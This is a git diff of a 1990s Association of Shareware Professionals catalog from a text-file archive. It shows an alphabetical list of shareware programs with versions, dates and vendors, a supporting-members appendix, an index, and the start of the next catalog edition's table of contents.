PATTR 1.5 (11-05-90) Patri-Soft + PC Chart V1.5 (07-15-93) Guru Systems Ltd. + PC-AP 1.8 (01-01-94) Medlin Accounting Shareware + PC-AR 4.3 (01-01-94) Medlin Accounting Shareware + PC-Draft II 3.26 (01-01-93) Natural Software + PC-Draft-CAD 3.06g (12-20-93) Natural Software + PC-ECAP 3.01 (01-24-94) Circuit Systems + PC-File 7.0 (05-01-93) ButtonWare, Inc. + PC-FOOD II FOOD COSTING 7.02 (06-03-95) SCHRECK SOFTWARE + PC-Fortune 2.20 (09-30-92) JAYAR Systems + PC-GL 3.8 (01-01-94) Medlin Accounting Shareware + PC-HAM 3.52 (03-20-91) Software for Amateur Radio + PC-PR 2.4 (02-01-94) Medlin Accounting Shareware + PC-Proof 2.0A (10-18-93) Intellect Systems + PC-TRACK 2.14 (01-09-92) Acme Workshops + PC-Vault 4.6 (08-09-93) Johnson Computer Systems, Inc. + PC-Vault Plus 4.6 (08-09-93) Johnson Computer Systems, Inc. + PCDESK 5.1 (07-02-95) Wells Computing Services + PCFDial 1.05 (05-26-92) Barn Owl Software + PCForm 3.0b (09-10-93) CareWare + PCINV 1.3 (01-01-94) Medlin Accounting Shareware + PCLoan5 5.09 (09-01-94) Bottom Line Software, Inc. + PCM100.COM 1.01 (08-25-91) Charier Consultants Services + PCOPY 9.3 (09-01-93) Patri-Soft + PCStat 2.7 (01-01-94) PC Information Systems + PCX2FNT v1.2 (04-18-92) TAXWARE + PCX2PCL v1.62 (07-01-93) TAXWARE + PDAILY 1.0 (10-10-86) Patri-Soft + PDEL 4.4 (05-01-92) Patri-Soft + PEG 2.06 (09-13-93) Cascoly Software + PentaBlox 1.01 (08-08-94) Aquila Software + PerCnt VBX 2.5 (08-14-94) Mabry Software + Periodic Table 2.03 (05-19-94) SMI Corporation + Personal Calendar (PC) for DOS 14.71 (11-18-94) FunStuff + Software + Personal Challenge 1.1 (10-04-94) R.K. West Consulting + Personal Com Lib for PowerBASIS 4.2 (09-01-94) MarshallSoft + Computing, Inc. + + Appendix E, "Sorted list of all programs" 859 + + + + Personal Comm Lib for BASIC 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Comm Lib for Pascal 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Comm Lib for Windows 1.1 (08-01-94) MarshallSoft + Computing, Inc. + Personal Comm Library for C 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Finances 2 4.02h (01-12-94) Spitfire Software + Personal Hotnet 4.0 (09-30-93) Robichaux and Associates + Personal Protocol Lib 4 Pascal 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Protocol Lib for C/C++ 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Schedule 1.02 (04-20-95) Will Baldwin + Personal Tarot 3.1 (10-04-94) R.K. West Consulting + Personal Time Card 2.6 (10-29-93) Fischer Grafix & Software + Photo Show 3D 1.21 (03-05-95) Progressive Logic + PhotoPat 1.5 (09-30-94) Rainbow Scan, Inc. + PHRASE.ZIP 1.0 (12-20-93) Larry W Parker + Pink Bunny 1.0 (11-20-93) Guy Software + Pinocle Games 1.2 (01-01-93) Michael G. Bruckner + PixFolio Image Catalog System 2.0.83 (07-03-93) ACK Software + Plain Vanilla Labels 3.15 (01-10-93) Rosewood Software + Playground 1.0a (01-04-95) Object International, Inc. + PLOTTER 7.1 (07-04-95) Wells Computing Services + PMFLCOMP 1.61 (05-30-95) American Coders, LTD. + PMZIP 1.00 (01-14-91) Nico Mak Computing, Inc. + PocketD Plus 4.2 (11-05-94) PocketWare + PoeTrio 1.0 (04-07-91) Chatfield Software, Inc. + Poetry Generator 2.4a (01-28-94) R.K. West Consulting + POETRY STAR 1.1 (03-15-92) Chatfield Software, Inc. + PopDBF 4.05 (07-29-92) Lighthouse Software, Inc. + Portfolio Manager 4.5 (12-25-93) Shane Software International + POST TRACKER 1.0 (01-27-94) Robert Barrentine Consulting + PostCardMaster 4.20 (09-01-94) Unicorn Software Limited + Postit for Windows 3.1 3.0 (06-01-95) Henning Associates + Power 1.00 (10-11-92) Byte O'Software + Power C Shell 2.3 (09-01-93) Tay-Jee Software + Power Edit 2.02 (06-15-95) Target Software + PowerBatch 2.2 (05-15-94) CSD, Inc. + PowerBBS for Windows 2.50 (08-09-93) PowerBBS Computing + PPRINT 5.5 (11-22-91) Patri-Soft + Practical Joke Collection 2.0 (05-13-95) R.K. West Consulting + Print Commander! 3.0s (09-14-93) Sorcerer Software + PrintEnvelope 3.01 (05-15-95) Maurer Associates + PrintGF 1.22 (01-08-95) Ravitz Software Inc. + PrintGL 1.54 (01-10-95) Ravitz Software Inc. + Private Library 3.0 (04-12-94) My Little Realm Enterprises + ProAct Contact Management 2.6 (01-01-94) ProDomus, Inc. + Probe VBX 1.0 (08-14-94) Mabry Software + ProDev*EPRICE 6.0 (12-06-94) Pro Dev Software + ProDev*MEMBER Church System 3.0g (01-16-95) Pro Dev Software + ProDev*QUOTE Quote/Bid System 6.0c (05-24-95) Pro Dev Software + + Appendix E, "Sorted list of all programs" 860 + + + + Professional Capture Systems 2.0 (01-26-95) JASC, Inc. + PROGRAM ENTITY ORGANIZER 1.2 (02-01-94) James W. Young & + Associates, Inc. + Program for a Small Planet 6.0 (10-26-93) Strat-Tech, Inc. + Program Group Specialist 1.0 (05-23-95) MIS Resources + International + A Project/Event Planner 3.4 (12-12-94) Sapphire Software Inc. + Prompter - Speaker's Utility 1.2 (06-11-93) OsoSoft + PROP OPTIMIZER (tm) 1.90 (10-27-93) Bates Engineering/Software + Property Master 4.01 (05-20-94) MSdataBase Solutions + ProtoCAD 3D 2.00 (04-23-94) TRIUS, Inc. + ProWindows LITE for BASIC PDS 7 5.21X (05-21-93) DSE Software + Publishing + ProWindows LITE for QuickBASIC 5.21Q (05-21-93) DSE Software + Publishing + PS-SLEEVE 2.0 (03-01-92) JMJ Software + PSEARCH 5.2B (07-01-92) Patri-Soft + PTOUCH 2.0 (02-03-93) Patri-Soft + PUBLIC ACCESS(tm) 2.5 (09-05-94) IN/QUEST, LLC + Public Address 3.1 (10-05-94) Paradise Programming + Public Library 3.2 (04-12-95) My Little Realm Enterprises + Puffer 1.0 (05-25-95) Kent Briggs + Pulsar for Windows 3.0 (07-15-93) Tesserax Information Systems + PUT, GET, Install Utilities 3.43 (05-05-95) MicroFox Company + Q&A Study Aid 5.2 (07-31-95) Quid Pro Quo Software + q&dBase for Windows 2.0a (10-23-94) Q&D Software Development + Q4Tool 1.6b (08-06-93) CareWare + Qanalyst 2.05 (09-19-90) Barn Owl Software + QBALL 2.40 (06-01-94) Benjamin W. Hartley + QCDRUN 1.0B (06-05-93) QUART, Inc. + QENV 2.5 (08-07-94) Annette Cuomo + QFiler 3.2 (07-15-91) Jamestown Software + QFont 1.5 (10-20-90) Jamestown Software + QIC-BAT for CMS 1.2 (11-08-93) Command Line Software + QPACS 3.3 (02-01-95) Richard A. Williams + QRead 2.0 (03-23-95) DS Products + QUALITY MANAGEMENT SYSTEM 3.3 (03-12-93) PC-DSD + Quick-BAR! (Code) for Windows 1.0 (10-27-93) Mission Critical + Software + QuickDir 1.32 (11-16-93) SUPERWARE + QUICKEXT 1.1 (01-01-92) Feico Nater Shareware + QuickTax (tm) Planner/Estimator 1.04 (10-27-93) Bates + Engineering/Software + QUIK-INSTALL 2.0 (12-07-93) Michael L. Wester + Quilt 1.32 (04-09-92) Cascoly Software + Race The Nags 1.3 (08-05-93) Olsen Outdoors + RACONTEX 3.23 (11-20-93) Guy Software + RADIOSIM 3.0 (04-01-95) BREMENSON + RagTime for Windows 1.0a (10-15-93) Unique Software + Productions + RANGER TRACKER 2.0 (07-08-94) Robert Barrentine Consulting + Ravitz Editor 1.10b (08-12-93) Ravitz Software Inc. + RDIR: Relative DIRectory Size 1.43 (09-21-93) R.P.McCormick + READ 2.5 (07-02-95) Wells Computing Services + + Appendix E, "Sorted list of all programs" 861 + + + + REALIZE 1.0 (09-21-94) Transcendental Technologies + Recap 5.1 (08-14-95) R.K. West Consulting + RECIPE FILE MANAGEMENT 3.3 (02-01-94) First Step Software + Recon 2.50 (09-19-94) Amdox Corp. + Reconcile 1.30 (05-18-93) Shareable Software International + Records of the Realm 3.0 (04-12-94) My Little Realm + Enterprises + REFILE 3.1 (04-17-94) MegAS Corporation + Relor Rhyming Dictionary 1.0 (10-02-94) Doyle Bare + REMInder 1.2 (01-01-93) Michael G. Bruckner + Reminder 1.3F (02-01-93) Wilson WindowWare, Inc. + Report Utility for Paradox/DOS 2.04 (02-12-94) The C Group, + Inc. + RESTAURANT COST CONTROL 4.2 (01-15-94) First Step Software + Resume Master Deluxe 4.0 (02-01-94) Whirlwind Technologies + Rev. Lowell's Treasury of Humor 1.01 (03-01-95) Bardon Data + Systems + RexxBase 2.00 (05-15-95) American Coders, LTD. + RFILE: Relative File Size 1.16 (09-21-93) R.P.McCormick + RI-VB Database Toolkit v1.1 1.1 (02-15-95) MIS Resources + International + The Richard Webster System 4.0 (05-16-95) R.K. West Consulting + RideMatch 1.0 (11-11-93) Paradise Programming + The Right Resume 1.0c (05-01-95) Whirlwind Technologies + RISS Font Pak #1 1.3 (02-25-94) Rhode Island Soft Systems, + Inc. + RISS Icon Pak 1.3 (05-02-94) Rhode Island Soft Systems, Inc. + RMS-III: Ref.Mgn.Sys. 3.2b (03-20-94) Mulberry Software, Inc. + RoboCrap.v94 1.00 (01-02-95) Second Career Software + Rockford! 3.5 (05-01-94) OsoSoft + ROLLCALL.DBMS 3.5 (03-12-93) PC-DSD + Rolodeck 1.0 (05-03-95) Henning Associates + Rosenthal UnInstall 1.0 (04-25-94) Rosenthal Engineering + Rosenthal WinLite 1.0 (10-24-93) Rosenthal Engineering + Rosewood Journal 5.02 (09-21-93) Rosewood Software + RoText VBX 1.3 (08-14-94) Mabry Software + RPF Zip Control 2.1.5 (12-03-94) RPF Software + RPMSHARE 3.42 (12-05-94) South Pointe Software + RR 1.0 (01-01-92) Feico Nater Shareware + RRKeyCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCapsGerman (PST1) 2.0 (07-24-94) RoadRunner Computing + RRKeyCapsGerman (TT) 2.0 (07-24-94) RoadRunner Computing + RRMacCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRMacCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + RTAG 2.1 (05-01-93) Phillip H. Sherrod + Rubicon Publisher 2.2C (06-08-91) Rubicon Computer Labs Inc. + RUF100.ZIP 1.0 (03-31-95) MIS Resources International + SAB Diskette Utility 2.50 (01-01-94) Stewart A. Berman + SAC DATABASE 2.7.2 (07-20-95) C & R Business Systems Ltd. + + Appendix E, "Sorted list of all programs" 862 + + + + Safe Program 1.00 (07-01-95) Regnoc Software + SAFEPACK 1.5 (03-08-93) D J Harvey Software + Sales & Samples 1.0 (04-01-94) C T Johnson, Inc + Savings 3.0 (06-20-93) My Little Realm Enterprises + SC-Scripter 1.0 (08-27-94) SplitCycle Computing + SCAN 494 (04-04-94) EZ Software + SCBA Trak 2.40 (01-28-95) Raymond A.J. Pesek + Scholar Utilities 2.11 (02-01-93) Hawk Software + Schooner 2.50 GUI (03-14-95) Jonathan Cook + Sci & Eng Tool for Lotus 1-2-3 1.3 (06-01-93) K.I.T.A.L. + Software + SCP 1.04 (11-18-94) Christopher J. Noyes Software + Screen Saver Sampler 2.0 (01-01-95) Damsel Software Group + SCROLLit 1.8 (10-19-93) Bromfield Software Products + ScrollZ 2.10 (09-01-94) Unicorn Software Limited + Search-N-Store 3.4 (06-14-94) Shawn Anderson SoftWare + Seascape 1.4 (11-26-93) Advanced Computer Tektonics + Second Guess 1.1 (07-10-95) Arcanum Computing + SEE (File Viewer) 5.10 (05-05-95) MicroFox Company + SensuVoX I 0.00 (01-29-95) Unicorn Software Limited + Serial File Copy 3.5 (06-01-94) MarshallSoft Computing, Inc. + Service Call Manager 2.0 (02-08-95) CPI computer services + SETUP.EXE 4.6 (08-12-95) Chapter One Developments Ltd. + Shareware Reference Guides n/a (01-01-80) Association of + Shareware Professionals + Shareware Tracker 3.11 (11-05-93) RMH Computer Services + Shell 1.2.3 (07-20-95) C & R Business Systems Ltd. + SHERLOCK 2.73 (12-28-93) Gulf Sierra + Shez 9.5 (10-29-93) California Software Design + SHIP TRACKER 1.2 (03-15-93) Robert Barrentine Consulting + Shooting Gallery 3.3 (02-07-95) Arcanum Computing + ShotZ 3.00 (01-15-92) Unicorn Software Limited + Silver Wolf Desktop 1.0 (12-12-94) Silver Wolf Software + Simply Docs 2.1 (10-29-93) SimpleWare + Simply Help! 1.06 (04-08-92) SimpleWare + Simply Labels 4.02 (02-11-93) SimpleWare + Simstat 3.0e (04-01-94) Provalis Research + SINCE: List Modified Files 1.29 (07-24-93) R.P.McCormick + SkyGlobe 3.6 (10-15-93) KlassM Software, Inc. + SkyMap 2.1 (07-01-94) Christopher A. Marriott + SLIB10.ZIP 1.0 (03-31-95) MIS Resources International + Sloop Manager 1.2c (01-07-93) Sloop Software + SMALL BUSINESS ADVISOR 94.4 (10-15-94) RONIN Software + $mart Gambler 1.6 (01-01-94) PC Information Systems + Smart10 2.1 (10-02-94) Sympathetic Software + SmartCat Plus 1.5 (07-23-93) Shareable Software International + SmartDraw 2.01 (08-18-95) SmartDraw Software Inc. + SmilerShell 3.0 (03-29-95) Bardon Data Systems + SNAKE 1.0 (10-01-94) Chatfield Software, Inc. + Snooper 3.40 (06-21-95) Vias and Associates + SoundMasterDb 2.02 (09-14-92) TurboSystemsCo + SoundX VBX 1.3 (08-14-94) Mabry Software + SoundZ 4.00 (09-01-94) Unicorn Software Limited + SoundZ For Windows 2.15 (03-09-95) Unicorn Software Limited + + Appendix E, "Sorted list of all programs" 863 + + + + SPANISH DRILL! 1.8 (11-09-93) LONE WOLF ENTERPRISES + Spanish Helper Level One 1.3 (04-16-95) G.B. Blanchard + SpeedBack 2.3 (02-12-93) MicroTools Inc + Spelling Sentry 1.3 (04-09-94) Wintertree Software Inc. + SQWEZ 1.0 (04-16-94) JM Software + STACKEY 4.0 (12-23-91) CTRLALT Associates + StarFlic 1.2 (04-14-94) TRIUS, Inc. + STARTREK the Computer Program 1.00 (05-25-90) Software for + Amateur Radio + StatTrak for Baseball 5.3 (01-15-95) ALL-PRO Software Inc. + Steam Properties 1.0 (06-28-95) + STEENBURGH's STUFF 3.0 (07-01-93) Tay-Jee Software + STF: Show Two FIles 1.45 (09-21-93) R.P.McCormick + Stock Wiz 2.0 (06-15-95) Informatik Inc. + Stowaway True Archival System 2.2 (07-29-93) Patri-Soft + Sub-contracor Billing 2.2.1 (07-20-95) C & R Business Systems + Ltd. + SUNDAY SCHOOL COLORS 3.7 (05-15-93) Randall Alaimo + Super Macro Library for 1-2-3 3.4 (06-01-93) K.I.T.A.L. + Software + Super Stuff Utilities 3.1 (10-11-93) Super Tools + Super VGA Puzzle 2.04 (05-14-94) Cascoly Software + Super!Market 1.10 (12-01-93) Trulli Tops Software, Inc. + SuperDIR 1.1 (08-20-95) Cottonwood Software + SuperFlow V1.10 (10-01-93) Advanced Technology Group, Inc. + SuperFly 2.1 (09-01-94) Arcanum Computing + SuperSet - Environment Extender 1.1 (02-01-95) Ross Leidy + SwimBase 2.04 (07-15-93) Words to Go + SysChk 2.38 (09-01-93) Advanced Personal Systems + System Monitor 3.0 (10-24-93) Rosenthal Engineering + T-Zero 1.04 (11-30-93) Dennis M. Cunningham + Tag Line Xpress 4.00 (05-20-94) Ron Janorkar + Talking ABC's 4.0 (02-10-93) Redwood Games + Tangram 1.1 (04-15-94) Judah Warshaw + TASK MASTER 2.4c (11-24-93) RKS Software, Inc. + Task Scheduler for DOS 2.5 (08-01-93) Simian Id Software + TC's Personal Data Manager 1.20 (02-17-95) Specific + Applications Software + TC's Toolbox 2.3 (02-17-95) Specific Applications Software + Teach Your Children 2.0 (02-06-95) Q&D Software Development + Technical Editor (DOS) 2.80 (08-15-94) On-Target Software + Technical Editor (OS/2) 2.80 (08-15-94) On-Target Software + Technical Editor (Windows NT) 2.80 (08-15-94) On-Target + Software + Teleshare/DOS Remote Access 3 (06-01-95) P. C. Softsmith + Textshot 4.0 (02-03-95) McAdams Associates + Thelma ThistleBlossom 5.20 (12-26-93) Timpanogos Software + Thelma's ClichePlus 1.8 (01-04-94) Timpanogos Software + Thelma's SpellPlus 1.1 (01-04-94) Timpanogos Software + Thoroughbred Handicapper Pro 2.1 (06-15-94) Whirlwind + Technologies + Tikler 5.3 (08-05-93) Olsen Outdoors + Tile Match 1.2 (09-01-94) Arcanum Computing + Time is Money 2.3 (12-07-94) Custom Data Solutions + + Appendix E, "Sorted list of all programs" 864 + + + + TimeCapture 2.4 (08-11-93) Versatile Software Solutions, Inc. + TimeClock 1.1 (11-01-94) KMR Consulting + Timeclock I 2.4s (04-15-94) Faught Data Systems, Inc. + TMC Calendar & Phone Book 2.1 (01-17-93) Specific Applications + Software + Tolman Dental Program 5.0 (04-01-94) Peter T. Smith D.D.S. + TommySoftware CAD/Draw 1.10b (04-16-93) + Toolbar 2X for Word 6.0 2.0 (05-02-95) AMF Shareware + Productions + ToolBOX 1.4 (11-14-93) The Binary Toolshed + ToolDriver 2.01 (04-15-93) ConVal Software, Inc. + TOP 2.0 (11-15-93) TNC Technology + Top Draw 2.0 (06-30-94) Top Software + Top Fonts Sampler 1.3 (08-23-93) Elfring Soft Fonts + Total Investor for 1-2-3 DOS 2.1 (11-12-93) Hughes Financial + Services + Total Investor for 1-2-3 Window 3.0 (08-17-95) Hughes + Financial Services + Total Investor for Symphony 2.1 (09-10-93) Hughes Financial + Services + Touch Type Tutor for Windows 1.0 (09-01-92) Gray Design + Associates + Towers 1.27 (02-20-93) Cascoly Software + Track-It 3.07 (12-29-93) Millennium Software + TRAINER 1.4 (08-20-93) Nine-Patch Software + TRAINING MANAGEMENT SYSTEM 1.2 (04-15-94) Oscar Wenholm + TRAINING TRACKER 2.0 (04-14-94) Robert Barrentine Consulting + Treasure Hunt Math 1.2 (02-12-93) Adventure LearningWare + TreeChart 2.00 (08-23-94) FineLine Software + TreeDraw 1.10 (05-01-95) SpanSoft + TreePlan for DOS 2.1 (08-12-93) Decision Support Services + TROOP TRACKER 4.0 (06-18-94) Robert Barrentine Consulting + TSR Download 2.9b (09-01-91) Elfring Soft Fonts + TURBO TPU TOOLKIT! 1.5 (03-01-94) LONE WOLF ENTERPRISES + TURF.v93 1.01 (05-14-94) Second Career Software + TUTOR.COM 4.5 (05-01-91) Computer Knowledge + U.S. Geography Tutor 1.0 (04-01-94) On-Target Software + UDECIDE 1.06 (11-10-92) Cascoly Software + ULTIMATE BACCARAT 2.0 (03-15-94) Accidental Software + ULTIMATE BLACKJACK 3.0 (03-15-94) Accidental Software + Ultimate Faxer for Word 6.0 1.0 (05-02-95) AMF Shareware + Productions + ULTIMATE GIN 1.42 (03-15-94) Accidental Software + UltiMenu 1.00 (08-19-94) Ron Janorkar + UnderBar 2.2 (02-25-93) Binary Systems + Universal Install 2.0 (05-10-94) The GoodSoft Co. + USEMGR 1.0 (03-15-93) XD Systems + VAR Grade 6.00 (04-30-93) VARed Software + Variable Investment Analyst 5.92 (04-01-95) Will Baldwin + VB-Dial 2.1c (11-05-93) Unique Software Productions + Vehicle Costs 2.4 (05-01-94) Graham Ferguson + Vending Machine 1.5 (06-17-95) Lincoln Beach Software + VERSAMAP 1.40 (06-14-94) Charles H. Culberson + + Appendix E, "Sorted list of all programs" 865 + + + + Version Control & Maintenance 2.8.1 (07-20-95) C & R Business + Systems Ltd. + VGAWHEEL V.1.91 (12-18-93) WHEEL Games + Video Librarian 4.02 (12-31-93) TurboSystemsCo + VideoMaster 9.00 (11-29-94) Unicorn Software Limited + VideoMaster For Windows 2.10 (03-09-95) Unicorn Software + Limited + ViDir/ViRes File Monitor System 1.02 (02-28-94) Vahnzinn + international + VIEW_MAN 1.10 (10-31-94) MicroMetric + Virus Simulator 2C (01-01-93) Rosenthal Engineering + Vision Edit 3.5 (04-30-93) Andrzej Brzezinski + Visual Calendar Planner 1.1 (02-10-94) Bok Nan Lo + Visual Computer Dictionary Plus 2.0 (05-10-95) BlueStar + Software + VMS40 - EMS emulator (disk) 1.2 (04-05-94) Fugue Software + Volcano Hunter 1.0 (06-15-91) Informative Technologies + VPT 4.15 (12-29-91) clySmic Software + WALL STREET RAIDER 4.2 (04-30-94) RONIN Software + Wall Street Simulator - Windows 1.00 (06-25-94) Larax Software + WatchDog 1.21 (10-30-92) Software & Consulting + Water and Steam Properties 1.2 (08-12-94) Katmar Software + WDiff 1.30 (05-29-95) C.Sitte Softwaretechnik + WDN: Wipe Directory Names 1.20 (07-24-93) R.P.McCormick + WebForms 1.0h (06-15-95) Q&D Software Development + WEBS 1.2 (06-11-92) Cascoly Software + wfListen 3.00 (03-28-94) Prodigy Computing + What-I-DID! for Windows 1.0 (10-25-93) Mission Critical + Software + WHATS-UP 1.20 (07-01-91) Software for Amateur Radio + WhizNotes 2.0 (03-20-94) Advanced Supprt Group, Inc. + Win Change 3.6 (09-30-94) JRE Enterprises + Win Multiple Configurations 6.2 (10-05-94) JRE Enterprises + WinBatch 4.0 (10-31-92) Wilson WindowWare, Inc. + WinBrowse 1.6a (04-17-95) Q&D Software Development + WinCap+ 1.00 (05-01-95) The CodeWorks+ Ltd. + WinCharging 1.0 (04-01-95) My Little Realm Enterprises + WinCheck 3.0P (02-01-92) Wilson WindowWare, Inc. + WinClip 3.5 (04-15-94) OsoSoft + WinDatCon 2.0 (04-18-94) Vogel Scientific Software + Windev - Windows Developer 1.56 (09-19-93) Helios Software + Solutions + Windev - Windows NT Developer 1.56 (09-19-93) Helios Software + Solutions + The Window BOSS & Data Clerk 8.02 (08-15-94) Star Guidance + Consulting, Inc. + Windows Gourmet 1.2 (01-01-95) Dovcom + Windows Lotto 1.1 (05-01-94) Data Solutions + The Wine Window 1.2 (08-01-95) Prospect Software + WinEdit Lite 2.0 (02-01-93) Wilson WindowWare, Inc. + WinEdit Pro 2.0 (02-01-93) Wilson WindowWare, Inc. + WinEdit Standard 2.0 (02-01-93) Wilson WindowWare, Inc. + WinFlash 3.0 (12-21-93) Open Windows + WinGRAB for Windows 2.0 (08-31-93) ZPAY Payroll Systems, Inc. + + Appendix E, "Sorted list of all programs" 866 + + + + WinGraph 1.1 (03-05-93) XWare, Inc. + WINIMAGE 1.11 (09-15-93) Vollant Gilles + WinJottr 1.0 (04-10-94) Open Windows + WinKillr 1.0 (05-28-95) Open Windows + WinNET Mail for MS Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + WinOCR 2.0b (09-20-93) SoftTech + WINPAK #1 1.2 (01-20-93) Rhode Island Soft Systems, Inc. + WinPost 3.2b (07-01-93) Eastern Mountain Software + WinPrice 1.0 (02-10-94) Open Windows + WinProof 1.0C (01-28-94) Intellect Systems + WinSecure 2.0 (03-01-94) ViewPoint Software, Inc. + WINstall 1.0a (11-01-94) Dovcom + WinUpD8R 4.1 (03-12-95) Open Windows + Winvelope 5.0 (06-04-95) Winvelope Software + WInvoices 1.0d (05-31-95) Q&D Software Development + WINWHEEL 1.70 (01-16-93) WHEEL Games + WinZip 5.0 (11-08-93) Nico Mak Computing, Inc. + WINZLE 1.07 (09-28-94) Cascoly Software + WizManager 1.1c (08-02-93) Mijenix + Wndlib 1.0 (03-25-94) Burnham Park Software, Inc. + WonderBar 4.4 (04-20-93) Binary Systems + Word Fugue 3.1 R1 (01-15-94) Fugue Software + Word Rescue #1 1.0 (02-10-93) Redwood Games + WordMaster 1.81 (03-01-93) MasterWorks + Wordware v3.0.12a for WinWord 6 3.0.12a (05-02-95) AMF + Shareware Productions + Workbase 4.3 (05-15-95) R.K. West Consulting + WOWSpill 1.0 (09-09-93) World Of Windows Software + WRITE CHINESE 1.00 (05-18-94) Awareness Productions + Writer's Cramp 2.2 (09-30-94) JRE Enterprises + Wssindex 5.27 (06-05-93) WSS Division of DDC + WStyle 1.13 (07-25-93) Wintertree Software Inc. + Wynter Stone's I Ching 1.2 (02-17-95) R.K. West Consulting + Wynter Stone's Quick Guide 1.6 (11-17-94) R.K. West Consulting + x-CAL3 3.31 (05-01-95) Extensions Software Corporation + x-CON3 1.44 (05-01-95) Extensions Software Corporation + x-FILE3 1.74 (05-01-95) Extensions Software Corporation + x-FONE3 2.18 (05-01-95) Extensions Software Corporation + x-FONE4 1.25 (06-18-95) Extensions Software Corporation + x-FORUM3 1.28 (05-01-95) Extensions Software Corporation + x-FORUM4 1.12 (06-18-95) Extensions Software Corporation + x-NEWS3 1.57 (05-01-95) Extensions Software Corporation + x-OUT3 1.44 (05-01-95) Extensions Software Corporation + x-OUT4 1.31 (06-18-95) Extensions Software Corporation + x-SKED3 1.58 (05-01-95) Extensions Software Corporation + XDIR 3.05 (03-09-91) XD Systems + XED 1.1b (08-24-94) David L. Dight + XFile 2.00 (03-15-95) Phase 33 Digital, Inc. + XFIRE: Action Puzzle game 1.02 (11-30-93) Cascoly Software + XMENU 1.0a (11-22-93) David M. Dibble + XPENS 1.3 (01-01-94) Richard A. Williams + XYSee 4.0a (09-04-94) Insight Advantage + + Appendix E, "Sorted list of all programs" 867 + + + + Yellow Sticky for Windows 3.1 4.00 (06-17-95) Henning + Associates + You're Hired! 1.33 (02-05-95) DataWell + Your ESP Test 1.5 (05-19-95) R.K. West Consulting + Z & Z Color 3.1 (09-01-95) Z & Z Software + Z & Z Puzzle 1.0 (09-01-95) Z & Z Software + ZIP Fugue (DOS) for PKZIP/UNZIP 1.2 (04-19-94) Fugue Software + ZIP Fugue (Windows) 2.0 (04-25-94) Fugue Software + Zip Pro 1,0 (11-22-94) Synaptek Software + Zip Server(TM) 1.3 (04-13-95) Redei Enterprises + ZiPaper 1.3c (12-30-91) Daniel Thomas + ZipInf VBX 1.1 (08-14-94) Mabry Software + ZIPKEY 2.04e (05-01-93) Eric Isaacson Software + ZIPPER Payroll 1.6 (02-28-93) SOFTCRAFT + Zippidy Do Da(tm) 1.01 (12-05-93) SMI Corporation + ZK-Shell 1.0 (04-22-92) ZPAY Payroll Systems, Inc. + ZPAY 3 3.6 (01-01-93) ZPAY Payroll Systems, Inc. + Zpeller 4.10 (01-01-95) Unicorn Software Limited + + Appendix F, "Supporting Members" 868 + + + + + + Appendix F + Supporting Members + + The Association of Shareware Professionals expresses a special + thanks to the following supporting members: + + + Authors: + David Berdan - ExpressWare Corporation + Richard Cherry Jr. - Cherry Tree Software + Phil Katz - PKWARE, Inc. + Sammy Mitchell - SemWare + + Vendors: + Die Deutsche Software Bibliothek + George Margelis - Bugetware + Gregory N. Wilson - Big Byte Software + Mohiyel-Din Hussein - Husco + Michael C. Comish - Software Excitement! + Arthur Tendler - The $5 Computer Software Store + + BBSs: + Don W. Watkins - CompuServe (IBMNET) + Tess Heder, Brian Miller - Channel 1 + Jon H. Larimore - GLIB + Bruce Jackson - The Break + Dave Harrison - Metro Online + Neil Fleming - Canada Remote Systems + + Index 869 + + + + + + + + Index + + 80286 utilities See: Norton's NDOS See: + Utilities, Hardware Utilities, Software + utilities, tools & add-ins, For JP + 286/386/486-specific Software + 80386 utilities See: + Utilities, Hardware O + utilities, Optical character + 286/386/486-specific recognition See: + 80486 utilities See: Graphics, Business + Utilities, Hardware applications, OCR + utilities, applications + 286/386/486-specific + P + A PKZIP 50 + A86 Macro Assembler 454 ProDev*QUOTE 349 + ASP 202 + ombudsman 711 Q + quotations 202 + C + CompuServe 711 R + Crossword Creator 236, 237 RAM utilities See: + Utilities, Hardware + D utilities, CPU & memory + D86 Debugger 455 Restore See: Utilities, + File utilities, Backup/ + G restore + GRAB Plus(r) 100, 159 retail software 202 + + H S + Handicapped See: Soft fonts See: Utilities, + Utilities, Special needs Printer utilities + + M T + MCGA utilities See: Trojan horse See: + Utilities, Hardware Utilities, Security + utilities, Screen, EGA/ programs + VGA specific + Memory utilities See: V + Utilities, Hardware VGA utilities See: + utilities, CPU & memory Utilities, Hardware + utilities, Screen, EGA/ + N VGA specific + NDOS See: Utilities, + Software tools & add- Z + ins, For JP Software ZIPKEY 305 + \ No newline at end of file diff --git a/textfiles.com/computers/asp9501.txt b/textfiles.com/computers/asp9501.txt new file mode 100644 index 00000000..a4d210b1 --- /dev/null +++ b/textfiles.com/computers/asp9501.txt @@ -0,0 +1,42340 @@ + + i + + + + + + Contents + + + ASP Shareware Catalog for BBS Users (Master Edition) 1 + + Chapter 1: How to read this catalog 2 + 1.1 Minimum requirements . . . . . . . . . . . . 2 + 1.2 Registration benefits . . . . . . . . . . . . 4 + 1.3 Sample product description . . . . . . . . . 5 + + + Part 1: Shareware Products + + + Chapter 2: Utilities 8 + 2.1 Disk utilities . . . . . . . . . . . . . . . 8 + 2.1.1 Disk cataloging . . . . . . . . . . . . 10 + 2.1.2 Hard disk utilities . . . . . . . . . . 12 + 2.1.2.1 Optimization & defragmentation . . 21 + 2.1.3 Floppy disk utilities . . . . . . . . . 22 + 2.1.3.1 Disk duplicating . . . . . . . . . 25 + 2.1.3.2 Disk formatting . . . . . . . . . . 26 + 2.1.4 Directory utilities . . . . . . . . . . 26 + 2.2 File utilities . . . . . . . . . . . . . . . 27 + 2.2.1 Backup/restore . . . . . . . . . . . . . 32 + 2.2.2 File encryption . . . . . . . . . . . . 37 + 2.2.3 File archiving & compression . . . . . . 38 + 2.2.4 File comparison . . . . . . . . . . . . 48 + 2.2.5 File sorting & conversion . . . . . . . 50 + 2.2.6 File viewers . . . . . . . . . . . . . . 52 + 2.3 Hardware utilities . . . . . . . . . . . . . 61 + 2.3.1 CPU & memory . . . . . . . . . . . . . . 61 